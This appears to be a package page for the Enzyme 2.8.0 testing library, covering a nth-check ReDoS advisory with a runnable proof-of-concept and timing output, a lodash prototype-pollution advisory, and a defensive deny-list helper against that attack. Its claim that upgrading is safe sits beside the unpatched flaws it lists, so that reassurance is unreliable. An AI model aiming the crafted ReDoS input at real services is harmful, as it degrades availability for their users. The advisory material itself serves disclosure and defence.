Enzyme is a widely adopted JavaScript testing utility designed to simplify React component testing. Version 2.8.0 builds on the foundation of 2.7.1, offering subtle improvements without introducing breaking changes in dependencies. Both share identical core dependencies such as Cheerio, Lodash, and object.assign, ensuring a consistent and reliable environment for simulating user interactions and asserting component behavior.
For developers, this means upgrading to version 2.8.0 is generally a safe and straightforward process. The peer dependency on React remains the same, supporting React 0.13.x, 0.14.x, and 15.0.0 and above. This compatibility helps integrate the library smoothly across different React projects.
The development dependencies remain consistent, indicating a continued commitment to quality assurance and a stable development workflow. Libraries such as Babel, ESLint, Mocha, and Webpack are used to build, test, and lint the library. The release dates differ (January 22 versus March 25), which only means that version 2.8.0 includes the latest bug fixes and internal improvements on top of the already stable 2.7.1, making the newer release the more reliable choice. Ultimately, sticking to a consistent testing strategy with Enzyme helps keep React applications robust and maintainable.
All the vulnerabilities related to version 2.8.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability in the regex is mainly due to the sub-pattern `\s*(?:([+-]?)\s*(\d+))?`, whose quantified, overlapping adjacent groups cause backtracking, and it can be exploited with the following code.
Proof of Concept
```javascript
// PoC.js
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str)
  }
  catch (err) {
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
  }
}
```
The Output
```
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
```
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions `pick`, `set`, `setWith`, `update`, `updateWith`, and `zipObjectDeep` allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
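As an added example (not lodash's code and not part of the advisory), a hardened deep-set helper for the case the advisory describes: a property path that comes from user input. It refuses the path segments through which a setter could reach `Object.prototype` and only descends into own properties. `safeSet`, `parsePath` and `isPrototypePolluted` are hypothetical names, and the path grammar is a simplified subset of lodash's.

```javascript
// Segments that let a deep-set walk from a plain object onto Object.prototype.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Split a dotted/bracketed path ("a.b[0].c") or an array path into segments,
// rejecting any segment that could redirect the write onto a prototype.
// Simplified: quoted bracket keys and escapes are not handled (assumption).
function parsePath(path) {
  const segments = Array.isArray(path)
    ? path.map(String)
    : (String(path).match(/[^.[\]]+/g) || []);
  for (const seg of segments) {
    if (FORBIDDEN_SEGMENTS.has(seg)) {
      throw new TypeError(`refusing to set through property "${seg}"`);
    }
  }
  return segments;
}

// Hardened deep set: creates intermediate containers only as own properties,
// so an inherited property (e.g. from a polluted prototype) is never descended into.
function safeSet(target, path, value) {
  const segments = parsePath(path);
  if (segments.length === 0) return target;
  let node = target;
  for (let i = 0; i < segments.length - 1; i++) {
    const key = segments[i];
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || typeof node[key] !== 'object' || node[key] === null) {
      // Numeric next segment means the caller wants an array at this level.
      node[key] = /^\d+$/.test(segments[i + 1]) ? [] : {};
    }
    node = node[key];
  }
  node[segments[segments.length - 1]] = value;
  return target;
}

// Detection helper for tests and health checks: has Object.prototype
// acquired an own property it should not have?
function isPrototypePolluted(key) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, key);
}
```

The same `parsePath` check can be applied in front of any deep-set call that takes user-controlled keys, whether or not lodash has been upgraded.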